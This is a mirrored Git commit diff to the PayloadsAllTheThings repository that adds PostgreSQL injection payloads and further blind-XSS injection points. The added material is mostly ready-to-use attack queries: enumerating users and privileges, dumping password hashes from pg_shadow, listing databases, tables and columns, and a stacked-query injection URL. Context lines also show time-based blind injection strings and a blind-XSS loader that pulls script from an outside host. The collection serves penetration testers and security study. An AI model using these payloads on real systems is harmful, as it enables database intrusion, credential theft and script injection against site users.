mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 13:25:27 +00:00
Merge pull request #112 from nizam0906/master
Added More PostgreSQL Injection Queries And Blind XSS endpoint
This commit is contained in:
commit
be3ef08d19
@ -3,9 +3,19 @@
|
|||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [PostgreSQL Comments](#postgresql-comments)
|
* [PostgreSQL Comments](#postgresql-comments)
|
||||||
|
* [PostgreSQL version](#postgresql-version)
|
||||||
|
* [PostgreSQL Current User](#postgresql-current-user)
|
||||||
|
* [PostgreSQL List Users](#postgresql-list-users)
|
||||||
|
* [PostgreSQL List Password Hashes](#postgresql-list-password-hashes)
|
||||||
|
* [PostgreSQL List Privileges](#postgresql-list-privileges)
|
||||||
|
* [PostgreSQL database name](#postgresql-database-name)
|
||||||
|
* [PostgreSQL List databases](#postgresql-list-database)
|
||||||
|
* [PostgreSQL List tables](#postgresql-list-tables)
|
||||||
|
* [PostgreSQL List columns](#postgresql-list-columns)
|
||||||
* [PostgreSQL Error Based](#postgresql-error-based)
|
* [PostgreSQL Error Based](#postgresql-error-based)
|
||||||
* [PostgreSQL Blind](#postgresql-blind)
|
* [PostgreSQL Blind](#postgresql-blind)
|
||||||
* [PostgreSQL Time Based](#postgresql-time-based)
|
* [PostgreSQL Time Based](#postgresql-time-based)
|
||||||
|
* [PostgreSQL Stacked query](#postgresql-stacked-query)
|
||||||
* [PostgreSQL File Read](#postgresql-file-read)
|
* [PostgreSQL File Read](#postgresql-file-read)
|
||||||
* [PostgreSQL File Write](#postgresql-file-write)
|
* [PostgreSQL File Write](#postgresql-file-write)
|
||||||
* [PostgreSQL Command execution](#postgresql-command-execution)
|
* [PostgreSQL Command execution](#postgresql-command-execution)
|
||||||
@ -20,6 +30,64 @@
|
|||||||
/**/
|
/**/
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## PostgreSQL Version
|
||||||
|
|
||||||
|
```sql
|
||||||
|
SELECT version()
|
||||||
|
```
|
||||||
|
|
||||||
|
## PostgreSQL Current User
|
||||||
|
|
||||||
|
```sql
|
||||||
|
SELECT user;
|
||||||
|
SELECT current_user;
|
||||||
|
SELECT session_user;
|
||||||
|
SELECT usename FROM pg_user;
|
||||||
|
SELECT getpgusername();
|
||||||
|
```
|
||||||
|
|
||||||
|
## PostgreSQL List Users
|
||||||
|
|
||||||
|
```sql
|
||||||
|
SELECT usename FROM pg_user
|
||||||
|
```
|
||||||
|
|
||||||
|
## PostgreSQL List Password Hashes
|
||||||
|
|
||||||
|
```sql
|
||||||
|
SELECT usename, passwd FROM pg_shadow
|
||||||
|
```
|
||||||
|
|
||||||
|
## PostgreSQL List Privileges
|
||||||
|
|
||||||
|
```sql
|
||||||
|
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
|
||||||
|
```
|
||||||
|
|
||||||
|
## PostgreSQL Database Name
|
||||||
|
|
||||||
|
```sql
|
||||||
|
SELECT current_database()
|
||||||
|
```
|
||||||
|
|
||||||
|
## PostgreSQL List Database
|
||||||
|
|
||||||
|
```sql
|
||||||
|
SELECT datname FROM pg_database
|
||||||
|
```
|
||||||
|
|
||||||
|
## PostgreSQL List Tables
|
||||||
|
|
||||||
|
```sql
|
||||||
|
SELECT table_name FROM information_schema.tables
|
||||||
|
```
|
||||||
|
|
||||||
|
## PostgreSQL List Columns
|
||||||
|
|
||||||
|
```sql
|
||||||
|
SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
|
||||||
|
```
|
||||||
|
|
||||||
## PostgreSQL Error Based
|
## PostgreSQL Error Based
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
@ -48,6 +116,14 @@ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
|
|||||||
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
|
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## PostgreSQL Stacked Query
|
||||||
|
|
||||||
|
Use a semi-colon ";" to add another query
|
||||||
|
|
||||||
|
```sql
|
||||||
|
http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));--
|
||||||
|
```
|
||||||
|
|
||||||
## PostgreSQL File Read
|
## PostgreSQL File Read
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
|
@ -416,6 +416,12 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
|
|||||||
- Referer Header
|
- Referer Header
|
||||||
- Custom Site Analytics
|
- Custom Site Analytics
|
||||||
- Administrative Panel logs
|
- Administrative Panel logs
|
||||||
|
- User Agent
|
||||||
|
- Custom Site Analytics
|
||||||
|
- Administrative Panel logs
|
||||||
|
- Comment Box
|
||||||
|
- Administrative Panel
|
||||||
|
|
||||||
|
|
||||||
## Polyglot XSS
|
## Polyglot XSS
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user